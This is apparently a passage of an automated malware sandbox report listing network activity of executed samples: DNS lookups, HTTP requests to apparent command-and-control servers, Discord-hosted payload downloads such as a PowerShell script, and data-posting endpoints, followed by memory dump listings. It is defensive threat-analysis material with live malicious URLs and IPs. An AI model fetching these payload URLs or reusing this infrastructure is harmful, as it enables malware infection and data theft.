      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kE9iOYDb%2BFeYzuZ8FSinAeLpHXjZNy3A86o9FaT3Fw0uU9OrX1cr%2Bm9C5sVzcss%2F3C8omCLRXN4ZnoWuDnLG6A5BrcpuBCT3G9l5JJVji3ELFD7YhzHlEzlKlXNJugOygSioalg%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 6ab75b8c0aa87270-HAM
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
    • flag-us
      POST
      https://bh.mygameadmin.com/report7.4.php
      SystemNetworkService
      Remote address:
      172.67.213.194:443
      Request
      POST /report7.4.php HTTP/1.1
      Accept: */*
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
      Host: bh.mygameadmin.com
      Content-Length: 250
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:48 GMT
      Content-Type: application/json; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      vary: Accept-Encoding
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0x0Cr4XbLvZE4g50hL%2Bn8C9pGHZ4D4ZUY%2BzW77n4NUDCkazxwCcK3rhuXRAk7aGTXrH%2Fn4E5mtMBhTiailb4nnWZzo5lGStFEFdzTznMmxzUtLmKI%2Fc0jFFHGb6F3vYfRPaei6k%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 6ab75b916a704169-HAM
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
    • flag-us
      DNS
      ggg-cl.biz
      Details.exe
      Remote address:
      8.8.8.8:53
      Request
      ggg-cl.biz
      IN A
      Response
    • flag-us
      DNS
      ggg-cl.biz
      Details.exe
      Remote address:
      8.8.8.8:53
      Request
      ggg-cl.biz
      IN A
      Response
    • flag-us
      DNS
      gmpeople.com
      Remote address:
      8.8.8.8:53
      Request
      gmpeople.com
      IN A
      Response
      gmpeople.com
      IN A
      187.212.183.165
      gmpeople.com
      IN A
      118.33.109.122
      gmpeople.com
      IN A
      210.207.244.101
      gmpeople.com
      IN A
      177.206.228.123
      gmpeople.com
      IN A
      89.133.230.171
      gmpeople.com
      IN A
      189.165.94.67
      gmpeople.com
      IN A
      186.6.254.27
      gmpeople.com
      IN A
      190.117.75.91
      gmpeople.com
      IN A
      181.129.180.251
      gmpeople.com
      IN A
      190.218.32.60
    • flag-us
      DNS
      ggg-cl.biz
      Details.exe
      Remote address:
      8.8.8.8:53
      Request
      ggg-cl.biz
      IN A
      Response
    • flag-us
      DNS
      ggg-cl.biz
      Details.exe
      Remote address:
      8.8.8.8:53
      Request
      ggg-cl.biz
      IN A
      Response
    • flag-kr
      POST
      http://gmpeople.com/upload/
      Remote address:
      118.33.109.122:80
      Request
      POST /upload/ HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      Accept: */*
      Referer: http://gmpeople.com/upload/
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
      Content-Length: 180
      Host: gmpeople.com
    • flag-us
      DNS
      mile48.com
      Remote address:
      8.8.8.8:53
      Request
      mile48.com
      IN A
      Response
    • flag-us
      DNS
      lecanardstsornin.com
      Remote address:
      8.8.8.8:53
      Request
      lecanardstsornin.com
      IN A
    • 45.133.1.107:80
      http://45.133.1.107/server.txt
      http
      File.exe
      482 B
      858 B
      6
      6

      HTTP Request

      GET http://45.133.1.107/server.txt

      HTTP Response

      200
    • 186.2.171.3:80
      http://186.2.171.3/seemorebty/il.php?e=md9_1sjm
      http
      md9_1sjm.exe
      648 B
      928 B
      5
      4

      HTTP Request

      GET http://186.2.171.3/seemorebty/il.php?e=md9_1sjm

      HTTP Response

      200
    • 212.192.241.15:80
      http://212.192.241.15/base/api/statistics.php
      http
      File.exe
      497 B
      910 B
      6
      5

      HTTP Request

      GET http://212.192.241.15/base/api/statistics.php

      HTTP Response

      200
    • 88.99.66.31:443
      https://iplogger.org/Zm8g4
      tls, http
      md9_1sjm.exe
      1.2kB
      7.0kB
      11
      10

      HTTP Request

      GET https://iplogger.org/Zm8g4

      HTTP Response

      200
    • 208.95.112.1:80
      http://ip-api.com/json/
      http
      Files.exe
      728 B
      592 B
      5
      2

      HTTP Request

      GET http://ip-api.com/json/

      HTTP Response

      200
    • 162.159.135.233:80
      cdn.discordapp.com
      tls
      File.exe
      399 B
      528 B
      5
      5
    • 162.159.135.233:80
      cdn.discordapp.com
      tls
      File.exe
      361 B
      528 B
      5
      5
    • 162.159.135.233:80
      cdn.discordapp.com
      tls
      File.exe
      288 B
      528 B
      5
      5
    • 162.159.135.233:80
      cdn.discordapp.com
      File.exe
      190 B
      92 B
      4
      2
    • 162.159.135.233:443
      https://cdn.discordapp.com/attachments/891021838312931420/906790845167063140/PL_Client.bmp
      tls, http
      File.exe
      25.1kB
      1.4MB
      532
      968

      HTTP Request

      GET https://cdn.discordapp.com/attachments/891021838312931420/906790845167063140/PL_Client.bmp

      HTTP Response

      200
    • 45.136.151.102:80
      http://staticimg.youtuuee.com/api/?sid=5210873&key=bb7daacc20701a5044aec0c05a863a05
      http
      Files.exe
      1.2kB
      802 B
      8
      7

      HTTP Request

      GET http://staticimg.youtuuee.com/api/fbtime

      HTTP Response

      200

      HTTP Request

      POST http://staticimg.youtuuee.com/api/?sid=5210873&key=bb7daacc20701a5044aec0c05a863a05

      HTTP Response

      200
    • 34.117.59.81:443
      https://ipinfo.io/widget
      tls, http
      File.exe
      870 B
      7.7kB
      8
      10

      HTTP Request

      GET https://ipinfo.io/widget

      HTTP Response

      200
    • 162.159.135.233:443
      https://cdn.discordapp.com/attachments/523238636561629190/894846882596126762/rkit.ps1
      tls, http
      Graphicss.exe
      941 B
      10.9kB
      11
      14

      HTTP Request

      GET https://cdn.discordapp.com/attachments/523238636561629190/894846882596126762/rkit.ps1

      HTTP Response

      200
    • 212.192.241.15:80
      http://212.192.241.15/base/api/getData.php
      http
      File.exe
      3.1kB
      1.8kB
      11
      9

      HTTP Request

      POST http://212.192.241.15/base/api/getData.php

      HTTP Response

      200

      HTTP Request

      POST http://212.192.241.15/base/api/getData.php

      HTTP Response

      200
    • 104.21.51.48:443
      https://niemannbest.me/?username=seo5
      tls, http
      FoxSBrowser.exe
      1.2kB
      7.3kB
      12
      17

      HTTP Request

      GET https://niemannbest.me/?username=seo1

      HTTP Response

      522

      HTTP Request

      GET https://niemannbest.me/?username=seo2

      HTTP Response

      522

      HTTP Request

      GET https://niemannbest.me/?username=seo3

      HTTP Response

      522

      HTTP Request

      GET https://niemannbest.me/?username=seo4

      HTTP Response

      522

      HTTP Request

      GET https://niemannbest.me/?username=seo5
    • 45.133.1.107:80
      http://45.133.1.107/download/NiceProcessX64.bmp
      http
      File.exe
      6.4kB
      335.8kB
      129
      229

      HTTP Request

      HEAD http://45.133.1.107/download/NiceProcessX64.bmp

      HTTP Response

      200

      HTTP Request

      GET http://45.133.1.107/download/NiceProcessX64.bmp

      HTTP Response

      200
    • 80.92.205.116:59599
      Process.exe
      152 B
      120 B
      3
      3
    • 212.192.241.15:80
      http://212.192.241.15/base/api/getData.php
      http
      File.exe
      779 B
      6.1kB
      8
      8

      HTTP Request

      POST http://212.192.241.15/base/api/getData.php

      HTTP Response

      200
    • 80.92.205.116:59599
      Process.exe
      152 B
      120 B
      3
      3
    • 80.92.205.116:59599
      Process.exe
      152 B
      120 B
      3
      3
    • 208.95.112.1:80
      http://ip-api.com/json/?fields=8198
      http
      SystemNetworkService
      1.3kB
      909 B
      9
      5

      HTTP Request

      GET http://ip-api.com/json/?fields=8198

      HTTP Response

      200

      HTTP Request

      GET http://ip-api.com/json/?fields=8198

      HTTP Response

      200

      HTTP Request

      GET http://ip-api.com/json/?fields=8198

      HTTP Response

      200
    • 172.67.213.194:443
      https://bh.mygameadmin.com/report7.4.php
      tls, http
      SystemNetworkService
      1.4kB
      5.6kB
      10
      12

      HTTP Request

      POST https://bh.mygameadmin.com/report7.4.php

      HTTP Response

      200
    • 88.99.66.31:443
      iplogger.org
      tls
      IEXPLORE.EXE
      677 B
      5.5kB
      8
      10
    • 88.99.66.31:443
      https://iplogger.org/favicon.ico
      tls, http
      IEXPLORE.EXE
      1.7kB
      24.8kB
      17
      24

      HTTP Request

      GET https://iplogger.org/1h49r7

      HTTP Response

      200

      HTTP Request

      GET https://iplogger.org/favicon.ico

      HTTP Response

      200
    • 80.92.205.116:59599
      Process.exe
      152 B
      120 B
      3
      3
    • 172.67.213.194:443
      https://bh.mygameadmin.com/report7.4.php
      tls, http
      SystemNetworkService
      1.1kB
      1.3kB
      6
      7

      HTTP Request

      POST https://bh.mygameadmin.com/report7.4.php

      HTTP Response

      200
    • 172.67.213.194:443
      https://bh.mygameadmin.com/report7.4.php
      tls, http
      SystemNetworkService
      1.1kB
      1.4kB
      6
      7

      HTTP Request

      POST https://bh.mygameadmin.com/report7.4.php

      HTTP Response

      200
    • 80.92.205.116:59599
      Process.exe
      152 B
      120 B
      3
      3
    • 80.92.205.116:59599
      Process.exe
      152 B
      120 B
      3
      3
    • 80.92.205.116:59599
      Process.exe
      152 B
      120 B
      3
      3
    • 204.79.197.200:443
      ieonline.microsoft.com
      tls
      iexplore.exe
      661 B
      7.6kB
      7
      10
    • 80.92.205.116:59599
      Process.exe
      152 B
      120 B
      3
      3
    • 80.92.205.116:59599
      Process.exe
      152 B
      120 B
      3
      3
    • 80.92.205.116:59599
      Process.exe
      152 B
      120 B
      3
      3
    • 80.92.205.116:59599
      Process.exe
      152 B
      120 B
      3
      3
    • 187.212.183.165:80
      gmpeople.com
      152 B
      3
    • 80.92.205.116:59599
      Process.exe
      152 B
      120 B
      3
      3
    • 45.9.20.13:80
      Details.exe
      152 B
      3
    • 80.92.205.116:59599
      Process.exe
      152 B
      120 B
      3
      3
    • 118.33.109.122:80
      http://gmpeople.com/upload/
      http
      636 B
      132 B
      4
      3

      HTTP Request

      POST http://gmpeople.com/upload/
    • 80.92.205.116:59599
      Process.exe
      52 B
      40 B
      1
      1
    • 8.8.8.8:53
      iplogger.org
      dns
      IEXPLORE.EXE
      58 B
      74 B
      1
      1

      DNS Request

      iplogger.org

      DNS Response

      88.99.66.31

    • 8.8.8.8:53
      ip-api.com
      dns
      SystemNetworkService
      56 B
      72 B
      1
      1

      DNS Request

      ip-api.com

      DNS Response

      208.95.112.1

    • 8.8.8.8:53
      toa.mygametoa.com
      dns
      SystemNetworkService
      63 B
      79 B
      1
      1

      DNS Request

      toa.mygametoa.com

      DNS Response

      34.64.183.91

    • 8.8.8.8:53
      toa.mygametoa.com
      dns
      SystemNetworkService
      63 B
      124 B
      1
      1

      DNS Request

      toa.mygametoa.com

    • 34.64.183.91:53
      toa.mygametoa.com
      SystemNetworkService
      61.7kB
      662.6kB
      1175
      1190
    • 8.8.8.8:53
      cdn.discordapp.com
      dns
      Graphicss.exe
      64 B
      144 B
      1
      1

      DNS Request

      cdn.discordapp.com

      DNS Response

      162.159.135.233
      162.159.134.233
      162.159.130.233
      162.159.133.233
      162.159.129.233

    • 8.8.8.8:53
      staticimg.youtuuee.com
      dns
      Files.exe
      68 B
      84 B
      1
      1

      DNS Request

      staticimg.youtuuee.com

      DNS Response

      45.136.151.102

    • 8.8.8.8:53
      ipinfo.io
      dns
      File.exe
      55 B
      71 B
      1
      1

      DNS Request

      ipinfo.io

      DNS Response

      34.117.59.81

    • 8.8.8.8:53
      topniemannpickshop.cc
      dns
      FoxSBrowser.exe
      67 B
      134 B
      1
      1

      DNS Request

      topniemannpickshop.cc

    • 8.8.8.8:53
      niemannbest.me
      dns
      FoxSBrowser.exe
      60 B
      92 B
      1
      1

      DNS Request

      niemannbest.me

      DNS Response

      104.21.51.48
      172.67.221.103

    • 8.8.8.8:53
      bh.mygameadmin.com
      dns
      SystemNetworkService
      64 B
      96 B
      1
      1

      DNS Request

      bh.mygameadmin.com

      DNS Response

      172.67.213.194
      104.21.75.46

    • 8.8.8.8:53
      www.microsoft.com
      dns
      SystemNetworkService
      63 B
      230 B
      1
      1

      DNS Request

      www.microsoft.com

      DNS Response

      104.85.1.163

    • 8.8.8.8:53
      all-mobile-pa1ments.com.mx
      dns
      FoxSBrowser.exe
      72 B
      131 B
      1
      1

      DNS Request

      all-mobile-pa1ments.com.mx

    • 8.8.8.8:53
      buy-fantasy-football.com.sg
      dns
      FoxSBrowser.exe
      73 B
      122 B
      1
      1

      DNS Request

      buy-fantasy-football.com.sg

    • 8.8.8.8:53
      ggg-cl.biz
      dns
      Details.exe
      112 B
      112 B
      2
      2

      DNS Request

      ggg-cl.biz

      DNS Request

      ggg-cl.biz

    • 8.8.8.8:53
      gmpeople.com
      dns
      58 B
      218 B
      1
      1

      DNS Request

      gmpeople.com

      DNS Response

      187.212.183.165
      118.33.109.122
      210.207.244.101
      177.206.228.123
      89.133.230.171
      189.165.94.67
      186.6.254.27
      190.117.75.91
      181.129.180.251
      190.218.32.60

    • 8.8.8.8:53
      ggg-cl.biz
      dns
      Details.exe
      112 B
      112 B
      2
      2

      DNS Request

      ggg-cl.biz

      DNS Request

      ggg-cl.biz

    • 8.8.8.8:53
      mile48.com
      dns
      56 B
      127 B
      1
      1

      DNS Request

      mile48.com

    • 8.8.8.8:53
      lecanardstsornin.com
      dns
      66 B
      1

      DNS Request

      lecanardstsornin.com

    MITRE ATT&CK Enterprise v6

    Downloads

    • memory/880-167-0x0000000001300000-0x0000000001372000-memory.dmp

      Filesize

      456KB

    • memory/880-166-0x00000000007B0000-0x00000000007FD000-memory.dmp

      Filesize

      308KB

    • memory/968-163-0x0000000001D60000-0x0000000001E61000-memory.dmp

      Filesize

      1.0MB

    • memory/968-165-0x0000000001E70000-0x0000000001ECD000-memory.dmp

      Filesize

      372KB

    • memory/1040-177-0x0000000003BC0000-0x0000000003D0C000-memory.dmp (Filesize: 1.3MB)
    • memory/1220-164-0x0000000003A40000-0x0000000003A55000-memory.dmp (Filesize: 84KB)
    • memory/1404-138-0x00000000023F0000-0x000000000240D000-memory.dmp (Filesize: 116KB)
    • memory/1404-155-0x0000000004DB4000-0x0000000004DB6000-memory.dmp (Filesize: 8KB)
    • memory/1404-92-0x00000000009D9000-0x00000000009FC000-memory.dmp (Filesize: 140KB)
    • memory/1404-132-0x0000000000220000-0x0000000000250000-memory.dmp (Filesize: 192KB)
    • memory/1404-139-0x0000000004DB1000-0x0000000004DB2000-memory.dmp (Filesize: 4KB)
    • memory/1404-144-0x0000000004DB3000-0x0000000004DB4000-memory.dmp (Filesize: 4KB)
    • memory/1404-134-0x0000000000400000-0x000000000088B000-memory.dmp (Filesize: 4.5MB)
    • memory/1404-97-0x0000000000BC0000-0x0000000000BDF000-memory.dmp (Filesize: 124KB)
    • memory/1404-143-0x0000000004DB2000-0x0000000004DB3000-memory.dmp (Filesize: 4KB)
    • memory/1492-170-0x0000000003170000-0x0000000003180000-memory.dmp (Filesize: 64KB)
    • memory/1492-95-0x0000000000020000-0x0000000000023000-memory.dmp (Filesize: 12KB)
    • memory/1516-55-0x0000000074E51000-0x0000000074E53000-memory.dmp (Filesize: 8KB)
    • memory/1656-146-0x0000000000230000-0x0000000000239000-memory.dmp (Filesize: 36KB)
    • memory/1656-123-0x000000000177C000-0x000000000178C000-memory.dmp (Filesize: 64KB)
    • memory/1656-147-0x0000000000400000-0x00000000016C8000-memory.dmp (Filesize: 18.8MB)
    • memory/1700-77-0x00000000009A0000-0x00000000009A1000-memory.dmp (Filesize: 4KB)
    • memory/1700-140-0x0000000004AB0000-0x0000000004AB1000-memory.dmp (Filesize: 4KB)
    • memory/1760-181-0x000007FEFB931000-0x000007FEFB933000-memory.dmp (Filesize: 8KB)
    • memory/1768-142-0x000000000030C000-0x0000000000328000-memory.dmp (Filesize: 112KB)
    • memory/1768-150-0x00000000001B0000-0x00000000001E0000-memory.dmp (Filesize: 192KB)
    • memory/1768-151-0x0000000000400000-0x00000000016D9000-memory.dmp (Filesize: 18.8MB)
    • memory/1836-182-0x0000000001C90000-0x0000000001C91000-memory.dmp (Filesize: 4KB)
    • memory/1836-183-0x0000000001C91000-0x0000000001C92000-memory.dmp (Filesize: 4KB)
    • memory/1836-185-0x0000000001C92000-0x0000000001C94000-memory.dmp (Filesize: 8KB)
    • memory/1884-79-0x0000000000D80000-0x0000000000D81000-memory.dmp (Filesize: 4KB)
    • memory/1884-169-0x000000001AE10000-0x000000001AE12000-memory.dmp (Filesize: 8KB)
    • memory/1884-148-0x0000000000250000-0x0000000000251000-memory.dmp (Filesize: 4KB)
    • memory/1976-161-0x00000000000E0000-0x000000000012D000-memory.dmp (Filesize: 308KB)
    • memory/1976-203-0x00000000004E0000-0x00000000004FB000-memory.dmp (Filesize: 108KB)
    • memory/1976-168-0x0000000000450000-0x00000000004C2000-memory.dmp (Filesize: 456KB)
    • memory/1976-204-0x0000000003160000-0x0000000003265000-memory.dmp (Filesize: 1.0MB)
    • memory/2312-188-0x00000000024E0000-0x000000000312A000-memory.dmp (Filesize: 12.3MB)
    • memory/2312-192-0x00000000024E0000-0x000000000312A000-memory.dmp (Filesize: 12.3MB)
    • memory/2312-190-0x00000000024E0000-0x000000000312A000-memory.dmp (Filesize: 12.3MB)
    • memory/2572-195-0x00000000023C0000-0x00000000023C1000-memory.dmp (Filesize: 4KB)
    • memory/2572-199-0x00000000023C1000-0x00000000023C2000-memory.dmp (Filesize: 4KB)
    • memory/2572-200-0x00000000023C2000-0x00000000023C4000-memory.dmp (Filesize: 8KB)
    • memory/2728-198-0x0000000002490000-0x00000000030DA000-memory.dmp (Filesize: 12.3MB)
    • memory/2728-201-0x0000000002490000-0x00000000030DA000-memory.dmp (Filesize: 12.3MB)
    • memory/2728-202-0x0000000002490000-0x00000000030DA000-memory.dmp (Filesize: 12.3MB)
    • memory/2924-205-0x00000000005F0000-0x00000000005F1000-memory.dmp (Filesize: 4KB)
